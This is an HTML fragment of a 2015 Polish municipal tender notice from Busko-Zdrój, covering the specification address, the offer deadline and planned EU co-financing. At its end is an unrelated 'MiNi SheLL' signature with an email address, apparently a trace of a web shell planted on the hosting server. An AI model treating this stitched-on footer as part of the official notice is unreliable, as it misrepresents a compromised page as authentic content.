b) urzędowych zmian w obowiązujących przepisach podatkowych, w tym zmiany podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umig.busko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Busku - Zdroju, ul. Mickiewicza 10, 28-100 Busko - Zdrój, pok. nr 37.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2015 godzina 11:00, miejsce: Urząd Miasta i Gminy w Busku - Zdroju, ul. Mickiewicza 10, 28-100 Busko - Zdrój, pok. nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Planuje się dofinansowanie zadania w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2014-2020. Oś Priorytetowa 6. Priorytet Inwestycyjny 9b, Działanie 6.5 *Rewitalizacja Obszarów Miejskich i Wiejskich*.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com